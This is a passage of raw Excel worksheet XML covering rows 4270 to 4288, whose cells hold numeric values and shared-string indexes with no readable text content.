        <v>3.13</v>
      </c>
      <c r="R4270" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4270" s="12" t="s">
        <v>27438</v>
      </c>
      <c r="T4270" s="12" t="s">
        <v>27439</v>
      </c>
      <c r="U4270" s="12" t="s">
        <v>27440</v>
      </c>
      <c r="V4270" s="12" t="s">
        <v>25878</v>
      </c>
      <c r="W4270" s="12">
        <v>79501</v>
      </c>
      <c r="X4270" s="12">
        <v>41</v>
      </c>
      <c r="Y4270" s="12" t="s">
        <v>27441</v>
      </c>
    </row>
    <row r="4271" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4271" s="12">
        <v>88001</v>
      </c>
      <c r="B4271" s="12" t="s">
        <v>30769</v>
      </c>
      <c r="D4271" s="12" t="s">
        <v>30770</v>
      </c>
      <c r="E4271" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F4271" s="12" t="s">
        <v>30774</v>
      </c>
      <c r="G4271" s="12" t="s">
        <v>27442</v>
      </c>
      <c r="H4271" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4271" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4271" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K4271" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4271" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4271" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4271" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4271" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4271" s="12" t="s">
        <v>27443</v>
      </c>
      <c r="Q4271" s="12">
        <v>3.17</v>
      </c>
      <c r="R4271" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4271" s="12" t="s">
        <v>27444</v>
      </c>
      <c r="T4271" s="12" t="s">
        <v>27445</v>
      </c>
      <c r="U4271" s="12" t="s">
        <v>27446</v>
      </c>
      <c r="V4271" s="12" t="s">
        <v>4936</v>
      </c>
      <c r="W4271" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4271" s="12">
        <v>5</v>
      </c>
      <c r="Y4271" s="12" t="s">
        <v>27447</v>
      </c>
    </row>
    <row r="4272" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4272" s="12">
        <v>88401</v>
      </c>
      <c r="B4272" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4272" s="12" t="s">
        <v>30287</v>
      </c>
      <c r="E4272" s="12" t="s">
        <v>31426</v>
      </c>
      <c r="F4272" s="12" t="s">
        <v>30288</v>
      </c>
      <c r="G4272" s="12" t="s">
        <v>30275</v>
      </c>
      <c r="H4272" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4272" s="12" t="s">
        <v>27</v>
      </c>
      <c r="J4272" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K4272" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4272" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4272" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4272" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4272" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4272" s="12" t="s">
        <v>27419</v>
      </c>
      <c r="Q4272" s="12">
        <v>3.17</v>
      </c>
      <c r="R4272" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4272" s="12" t="s">
        <v>27448</v>
      </c>
      <c r="T4272" s="12" t="s">
        <v>4675</v>
      </c>
      <c r="U4272" s="12" t="s">
        <v>27449</v>
      </c>
      <c r="V4272" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W4272" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4272" s="12">
        <v>3</v>
      </c>
      <c r="Y4272" s="12" t="s">
        <v>27450</v>
      </c>
    </row>
    <row r="4273" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4273" s="12">
        <v>88811</v>
      </c>
      <c r="B4273" s="12" t="s">
        <v>31312</v>
      </c>
      <c r="C4273" s="12" t="s">
        <v>31364</v>
      </c>
      <c r="D4273" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E4273" s="18" t="s">
        <v>31426</v>
      </c>
      <c r="F4273" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4273" s="12" t="s">
        <v>27451</v>
      </c>
      <c r="H4273" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4273" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4273" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4273" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4273" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4273" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4273" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4273" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4273" s="12" t="s">
        <v>27452</v>
      </c>
      <c r="Q4273" s="12">
        <v>3.18</v>
      </c>
      <c r="R4273" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4273" s="12" t="s">
        <v>27453</v>
      </c>
      <c r="T4273" s="12" t="s">
        <v>27454</v>
      </c>
      <c r="U4273" s="12" t="s">
        <v>27455</v>
      </c>
      <c r="V4273" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4273" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4273" s="12">
        <v>10</v>
      </c>
      <c r="Y4273" s="12" t="s">
        <v>27456</v>
      </c>
    </row>
    <row r="4274" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4274" s="12">
        <v>88851</v>
      </c>
      <c r="B4274" s="12" t="s">
        <v>30187</v>
      </c>
      <c r="D4274" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4274" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="G4274" s="12" t="s">
        <v>27457</v>
      </c>
      <c r="H4274" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4274" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4274" s="12" t="s">
        <v>26990</v>
      </c>
      <c r="K4274" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4274" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4274" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4274" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4274" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4274" s="12" t="s">
        <v>27458</v>
      </c>
      <c r="Q4274" s="12">
        <v>3.17</v>
      </c>
      <c r="R4274" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4274" s="12" t="s">
        <v>27459</v>
      </c>
      <c r="T4274" s="12" t="s">
        <v>27269</v>
      </c>
      <c r="U4274" s="12" t="s">
        <v>27460</v>
      </c>
      <c r="V4274" s="12" t="s">
        <v>3260</v>
      </c>
      <c r="W4274" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4274" s="12">
        <v>7</v>
      </c>
      <c r="Y4274" s="12" t="s">
        <v>27461</v>
      </c>
    </row>
    <row r="4275" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4275" s="12">
        <v>88961</v>
      </c>
      <c r="B4275" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C4275" s="12" t="s">
        <v>31171</v>
      </c>
      <c r="D4275" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4275" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4275" s="12" t="s">
        <v>31177</v>
      </c>
      <c r="G4275" s="12" t="s">
        <v>27462</v>
      </c>
      <c r="H4275" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4275" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4275" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4275" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4275" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4275" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4275" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4275" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4275" s="12" t="s">
        <v>27463</v>
      </c>
      <c r="Q4275" s="12">
        <v>3.17</v>
      </c>
      <c r="R4275" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4275" s="12" t="s">
        <v>27464</v>
      </c>
      <c r="T4275" s="12" t="s">
        <v>18750</v>
      </c>
      <c r="U4275" s="12" t="s">
        <v>27465</v>
      </c>
      <c r="V4275" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4275" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4275" s="12">
        <v>13</v>
      </c>
      <c r="Y4275" s="12" t="s">
        <v>27466</v>
      </c>
    </row>
    <row r="4276" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4276" s="12">
        <v>89001</v>
      </c>
      <c r="B4276" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4276" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4276" s="12" t="s">
        <v>31503</v>
      </c>
      <c r="F4276" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4276" s="12" t="s">
        <v>27467</v>
      </c>
      <c r="H4276" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4276" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4276" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4276" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4276" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4276" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4276" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4276" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4276" s="12" t="s">
        <v>27468</v>
      </c>
      <c r="Q4276" s="12">
        <v>3.17</v>
      </c>
      <c r="R4276" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4276" s="12" t="s">
        <v>27469</v>
      </c>
      <c r="T4276" s="12" t="s">
        <v>27470</v>
      </c>
      <c r="U4276" s="12" t="s">
        <v>27471</v>
      </c>
      <c r="V4276" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4276" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4276" s="12">
        <v>8</v>
      </c>
      <c r="Y4276" s="12" t="s">
        <v>27472</v>
      </c>
    </row>
    <row r="4277" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4277" s="12">
        <v>89211</v>
      </c>
      <c r="B4277" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4277" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4277" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4277" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4277" s="12" t="s">
        <v>27473</v>
      </c>
      <c r="H4277" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4277" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4277" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K4277" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4277" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4277" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4277" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4277" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4277" s="12" t="s">
        <v>27474</v>
      </c>
      <c r="Q4277" s="12">
        <v>3.16</v>
      </c>
      <c r="R4277" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4277" s="12" t="s">
        <v>27475</v>
      </c>
      <c r="T4277" s="12" t="s">
        <v>27476</v>
      </c>
      <c r="U4277" s="12" t="s">
        <v>27477</v>
      </c>
      <c r="V4277" s="12" t="s">
        <v>25878</v>
      </c>
      <c r="W4277" s="12">
        <v>106151</v>
      </c>
      <c r="X4277" s="12">
        <v>128</v>
      </c>
      <c r="Y4277" s="12" t="s">
        <v>27478</v>
      </c>
    </row>
    <row r="4278" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4278" s="12">
        <v>89431</v>
      </c>
      <c r="B4278" s="12" t="s">
        <v>30775</v>
      </c>
      <c r="C4278" s="12" t="s">
        <v>30776</v>
      </c>
      <c r="D4278" s="12" t="s">
        <v>30770</v>
      </c>
      <c r="E4278" s="12" t="s">
        <v>31431</v>
      </c>
      <c r="F4278" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4278" s="12" t="s">
        <v>27479</v>
      </c>
      <c r="H4278" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4278" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J4278" s="12" t="s">
        <v>9315</v>
      </c>
      <c r="K4278" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4278" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4278" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4278" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4278" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4278" s="12" t="s">
        <v>27480</v>
      </c>
      <c r="Q4278" s="12">
        <v>3.17</v>
      </c>
      <c r="R4278" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4278" s="12" t="s">
        <v>27481</v>
      </c>
      <c r="T4278" s="12" t="s">
        <v>25661</v>
      </c>
      <c r="U4278" s="12" t="s">
        <v>27482</v>
      </c>
      <c r="V4278" s="12" t="s">
        <v>10241</v>
      </c>
      <c r="W4278" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4278" s="12">
        <v>1</v>
      </c>
      <c r="Y4278" s="12" t="s">
        <v>27483</v>
      </c>
    </row>
    <row r="4279" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4279" s="12">
        <v>89501</v>
      </c>
      <c r="B4279" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4279" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4279" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4279" s="12" t="s">
        <v>27484</v>
      </c>
      <c r="H4279" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4279" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4279" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K4279" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4279" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4279" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4279" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4279" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4279" s="12" t="s">
        <v>27485</v>
      </c>
      <c r="Q4279" s="12">
        <v>3.18</v>
      </c>
      <c r="R4279" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4279" s="12" t="s">
        <v>27486</v>
      </c>
      <c r="T4279" s="12" t="s">
        <v>27434</v>
      </c>
      <c r="U4279" s="12" t="s">
        <v>27487</v>
      </c>
      <c r="V4279" s="12" t="s">
        <v>27488</v>
      </c>
      <c r="W4279" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4279" s="12">
        <v>5</v>
      </c>
    </row>
    <row r="4280" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4280" s="12">
        <v>89771</v>
      </c>
      <c r="B4280" s="12" t="s">
        <v>30425</v>
      </c>
      <c r="D4280" s="12" t="s">
        <v>30424</v>
      </c>
      <c r="F4280" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4280" s="12" t="s">
        <v>27489</v>
      </c>
      <c r="H4280" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4280" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4280" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4280" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4280" s="12" t="s">
        <v>4026</v>
      </c>
      <c r="M4280" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N4280" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O4280" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4280" s="12" t="s">
        <v>27490</v>
      </c>
      <c r="Q4280" s="12">
        <v>3.17</v>
      </c>
      <c r="R4280" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4280" s="12" t="s">
        <v>27491</v>
      </c>
      <c r="T4280" s="12" t="s">
        <v>27492</v>
      </c>
      <c r="U4280" s="12" t="s">
        <v>27493</v>
      </c>
      <c r="V4280" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4280" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4280" s="12">
        <v>32</v>
      </c>
      <c r="Y4280" s="12" t="s">
        <v>27494</v>
      </c>
    </row>
    <row r="4281" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4281" s="12">
        <v>90161</v>
      </c>
      <c r="B4281" s="12" t="s">
        <v>31345</v>
      </c>
      <c r="D4281" s="12" t="s">
        <v>31366</v>
      </c>
      <c r="E4281" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4281" s="12" t="s">
        <v>31367</v>
      </c>
      <c r="G4281" s="12" t="s">
        <v>27495</v>
      </c>
      <c r="H4281" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4281" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4281" s="12" t="s">
        <v>181</v>
      </c>
      <c r="K4281" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4281" s="12" t="s">
        <v>11596</v>
      </c>
      <c r="M4281" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N4281" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O4281" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4281" s="12" t="s">
        <v>27496</v>
      </c>
      <c r="Q4281" s="12">
        <v>3.19</v>
      </c>
      <c r="R4281" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4281" s="12" t="s">
        <v>27497</v>
      </c>
      <c r="T4281" s="12" t="s">
        <v>27498</v>
      </c>
      <c r="U4281" s="12" t="s">
        <v>27499</v>
      </c>
      <c r="V4281" s="12" t="s">
        <v>27020</v>
      </c>
      <c r="W4281" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4281" s="12">
        <v>19</v>
      </c>
      <c r="Y4281" s="12" t="s">
        <v>27500</v>
      </c>
    </row>
    <row r="4282" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4282" s="12">
        <v>90391</v>
      </c>
      <c r="B4282" s="12" t="s">
        <v>30804</v>
      </c>
      <c r="C4282" s="12" t="s">
        <v>30805</v>
      </c>
      <c r="D4282" s="12" t="s">
        <v>30800</v>
      </c>
      <c r="E4282" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4282" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4282" s="12" t="s">
        <v>27501</v>
      </c>
      <c r="H4282" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4282" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J4282" s="12" t="s">
        <v>258</v>
      </c>
      <c r="K4282" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4282" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4282" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4282" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4282" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4282" s="12" t="s">
        <v>27502</v>
      </c>
      <c r="Q4282" s="12">
        <v>3.18</v>
      </c>
      <c r="R4282" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4282" s="12" t="s">
        <v>27503</v>
      </c>
      <c r="T4282" s="12" t="s">
        <v>27504</v>
      </c>
      <c r="U4282" s="12" t="s">
        <v>27505</v>
      </c>
      <c r="V4282" s="12" t="s">
        <v>3984</v>
      </c>
      <c r="W4282" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4282" s="12">
        <v>1</v>
      </c>
      <c r="Y4282" s="12" t="s">
        <v>27506</v>
      </c>
    </row>
    <row r="4283" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4283" s="12">
        <v>90421</v>
      </c>
      <c r="B4283" s="12" t="s">
        <v>30452</v>
      </c>
      <c r="D4283" s="12" t="s">
        <v>30499</v>
      </c>
      <c r="E4283" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F4283" s="12" t="s">
        <v>30466</v>
      </c>
      <c r="G4283" s="12" t="s">
        <v>27507</v>
      </c>
      <c r="H4283" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4283" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4283" s="12" t="s">
        <v>26990</v>
      </c>
      <c r="K4283" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4283" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4283" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4283" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4283" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4283" s="12" t="s">
        <v>27485</v>
      </c>
      <c r="Q4283" s="12">
        <v>3.18</v>
      </c>
      <c r="R4283" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4283" s="12" t="s">
        <v>27508</v>
      </c>
      <c r="T4283" s="12" t="s">
        <v>27509</v>
      </c>
      <c r="U4283" s="12" t="s">
        <v>27510</v>
      </c>
      <c r="V4283" s="12" t="s">
        <v>3260</v>
      </c>
      <c r="W4283" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4283" s="12">
        <v>70</v>
      </c>
      <c r="Y4283" s="12" t="s">
        <v>27511</v>
      </c>
    </row>
    <row r="4284" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4284" s="12">
        <v>90521</v>
      </c>
      <c r="B4284" s="12" t="s">
        <v>30452</v>
      </c>
      <c r="D4284" s="12" t="s">
        <v>30499</v>
      </c>
      <c r="E4284" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4284" s="12" t="s">
        <v>30455</v>
      </c>
      <c r="G4284" s="12" t="s">
        <v>27512</v>
      </c>
      <c r="H4284" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4284" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4284" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K4284" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4284" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4284" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4284" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4284" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4284" s="12" t="s">
        <v>27513</v>
      </c>
      <c r="Q4284" s="12">
        <v>3.19</v>
      </c>
      <c r="R4284" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4284" s="12" t="s">
        <v>27514</v>
      </c>
      <c r="T4284" s="12" t="s">
        <v>27515</v>
      </c>
      <c r="U4284" s="12" t="s">
        <v>27516</v>
      </c>
      <c r="V4284" s="12" t="s">
        <v>16927</v>
      </c>
      <c r="W4284" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4284" s="12">
        <v>5</v>
      </c>
      <c r="Y4284" s="12" t="s">
        <v>27517</v>
      </c>
    </row>
    <row r="4285" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4285" s="12">
        <v>91321</v>
      </c>
      <c r="B4285" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C4285" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D4285" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4285" s="12" t="s">
        <v>30419</v>
      </c>
      <c r="G4285" s="12" t="s">
        <v>27518</v>
      </c>
      <c r="H4285" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4285" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4285" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K4285" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4285" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4285" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4285" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4285" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4285" s="12" t="s">
        <v>27519</v>
      </c>
      <c r="Q4285" s="12">
        <v>3.2</v>
      </c>
      <c r="R4285" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4285" s="12" t="s">
        <v>27520</v>
      </c>
      <c r="T4285" s="12" t="s">
        <v>27521</v>
      </c>
      <c r="U4285" s="12" t="s">
        <v>27522</v>
      </c>
      <c r="V4285" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W4285" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4285" s="12">
        <v>2</v>
      </c>
      <c r="Y4285" s="12" t="s">
        <v>27523</v>
      </c>
    </row>
    <row r="4286" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4286" s="12">
        <v>91411</v>
      </c>
      <c r="B4286" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4286" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4286" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4286" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4286" s="12" t="s">
        <v>27524</v>
      </c>
      <c r="H4286" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4286" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4286" s="12" t="s">
        <v>2643</v>
      </c>
      <c r="K4286" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4286" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4286" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4286" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4286" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4286" s="12" t="s">
        <v>27485</v>
      </c>
      <c r="Q4286" s="12">
        <v>3.18</v>
      </c>
      <c r="R4286" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4286" s="12" t="s">
        <v>27525</v>
      </c>
      <c r="T4286" s="12" t="s">
        <v>15310</v>
      </c>
      <c r="U4286" s="12" t="s">
        <v>27526</v>
      </c>
      <c r="V4286" s="12" t="s">
        <v>27020</v>
      </c>
      <c r="W4286" s="12">
        <v>92431</v>
      </c>
      <c r="X4286" s="12">
        <v>109</v>
      </c>
      <c r="Y4286" s="12" t="s">
        <v>27527</v>
      </c>
    </row>
    <row r="4287" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4287" s="12">
        <v>91921</v>
      </c>
      <c r="B4287" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4287" s="12" t="s">
        <v>30562</v>
      </c>
      <c r="E4287" s="12" t="s">
        <v>31481</v>
      </c>
      <c r="F4287" s="12" t="s">
        <v>30524</v>
      </c>
      <c r="G4287" s="12" t="s">
        <v>27528</v>
      </c>
      <c r="H4287" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4287" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4287" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K4287" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4287" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4287" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4287" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4287" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4287" s="12" t="s">
        <v>27529</v>
      </c>
      <c r="Q4287" s="12">
        <v>3.13</v>
      </c>
      <c r="R4287" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4287" s="12" t="s">
        <v>27530</v>
      </c>
      <c r="T4287" s="12" t="s">
        <v>27531</v>
      </c>
      <c r="U4287" s="12" t="s">
        <v>27532</v>
      </c>
      <c r="V4287" s="12" t="s">
        <v>16927</v>
      </c>
      <c r="W4287" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4287" s="12">
        <v>26</v>
      </c>
      <c r="Y4287" s="12" t="s">
        <v>27533</v>
      </c>
    </row>
    <row r="4288" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4288" s="12">
        <v>93431</v>
      </c>
      <c r="B4288" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4288" s="12" t="s">
        <v>31504</v>
      </c>
      <c r="F4288" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4288" s="12" t="s">
        <v>27542</v>
      </c>
      <c r="H4288" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4288" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4288" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4288" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4288" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4288" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4288" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4288" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4288" s="12">
        <v>3.19</v>
      </c>
      <c r="Q4288" s="12">
        <v>3.19</v>
      </c>
      <c r="R4288" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4288" s="12" t="s">
        <v>27543</v>
      </c>
      <c r="T4288" s="12" t="s">
        <v>27544</v>
      </c>
      <c r="U4288" s="12" t="s">
        <v>27545</v>
      </c>
      <c r="V4288" s="12" t="s">
        <v>8165</v>
      </c>
